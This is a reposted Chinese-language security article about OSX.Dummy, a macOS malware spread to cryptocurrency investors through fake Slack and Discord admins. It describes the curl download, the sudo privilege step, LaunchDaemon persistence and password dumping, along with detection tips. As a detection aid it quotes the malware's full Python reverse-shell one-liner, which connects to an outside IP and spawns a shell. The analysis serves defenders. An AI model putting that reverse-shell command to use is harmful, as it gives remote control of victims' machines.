近期，MacOS上又傳播一種新型的惡意軟件，被稱為OSX.Dummy。攻擊者通過欺騙和引導用戶下載和執(zhí)行惡意二進制文件，如果文件被執(zhí)行，并且惡意軟件能夠連接到對手的C2服務器（命令控制服務器），攻擊者就可以控制目標系統(tǒng)。 使用MacOS惡意軟件的黑客瞄準使用Slack和Discord聊天平臺的加密貨幣投資者。被稱為OSX.Dummy的惡意軟件使用了一種不太復雜的感染方法，但是也有許多用戶被感染，并在受害電腦上遠程執(zhí)行任意代碼。

惡意軟件OSX.Dummy簡介

      研究人員Remco Verhoef首先發(fā)現(xiàn)并描述了惡意軟件，并向SANS InfoSec Handlers Diary Blog發(fā)布了他的發(fā)現(xiàn)。研究人員說，他上周觀察到多次攻擊。

通過假冒來自加密相關的Slack或Discord聊天組的管理員或關鍵人物。分享惡意代碼，導致下載和執(zhí)行惡意二進制文件 。

      Wardle指出，這個二進制文件沒有簽名，并補充說，惡意軟件能夠避開macOS Gatekeeper安全軟件。

“通常，這樣的二進制文件將被網(wǎng)關阻止。但是，如果用戶 通過終端命令直接 下載并運行二進制文件  ，網(wǎng)關不會發(fā)揮作用，因此無符號二進制文件將被允許執(zhí)行，內(nèi)置的macOS惡意軟件緩解將不再起作用。”

      被稱為惡意軟件OSX.Dummy，因為用于轉(zhuǎn)儲受害者密碼的目錄之一被稱為“/ tmp / dumpdummy”。

惡意軟件攻擊原理分析

      攻擊者會誘使用戶執(zhí)行腳本，然后通過cURL下載重要的34Mb OSX.Dummy惡意軟件。下載文件保存在macOS / tmp / script目錄下，然后執(zhí)行。

“該文件是一個大型的mach064二進制文件（34M），在VirusTotal上評分為0/60，”

      該腳本欺騙受害者下載OSX.Dummy。

      當執(zhí)行惡意軟件二進制文件時，macOS sudo命令（通過終端）將惡意軟件的權限更改為root。“他要求用戶在終端上輸入他們的密碼，”根據(jù)Apple的說法，“要在Mac上的終端中執(zhí)行sudo命令，您必須使用具有密碼的管理員帳戶登錄。” 成功安裝以后，惡意軟件會丟棄各種macOS目錄中的代碼，包括“/Library/LaunchDaemons/com.startup.plist”，它提供了OSX.Dummy持久性。

 

      Wardle指出，如果攻擊成功，并且惡意軟件能夠連接到對手的C2服務器，攻擊者就可以控制目標系統(tǒng)。

最后 檢測及防范方法

      今天我們分析了一個新的mac惡意軟件。我稱之為OSX.Dummy為：

• 感染方法很愚蠢
• 二進制的巨大規(guī)模是愚蠢的
• 持久性機制是蹩腳的（因此也是愚蠢的）
• 能力相當有限（因而相當愚蠢）
• 在每一步（愚蠢）檢測都是微不足道的
• ...最后，惡意軟件將用戶的密碼保存到 dumpdummy

      要檢查您是否被感染，請以root身份運行KnockKnock（因為惡意軟件集的組件只能由root讀�。�。查找 com.startup.plist 執(zhí)行名為'script.sh' 的未簽名啟動項：

      還可以查找以root身份運行的python運行實例，并使用上述反向shell命令：

$ ps aux | grep -i python
root python -c import socket,subprocess,os; 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); 
s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);

轉(zhuǎn)自：安全加

標簽： 安全 代碼 服務器 腳本 權限

版權申明：本站文章部分自網(wǎng)絡，如有侵權，請聯(lián)系：west999com@outlook.com
特別注意：本站所有轉(zhuǎn)載文章言論不代表本站觀點！
本站所提供的圖片等素材，版權歸原作者所有，如需使用，請與原作者聯(lián)系。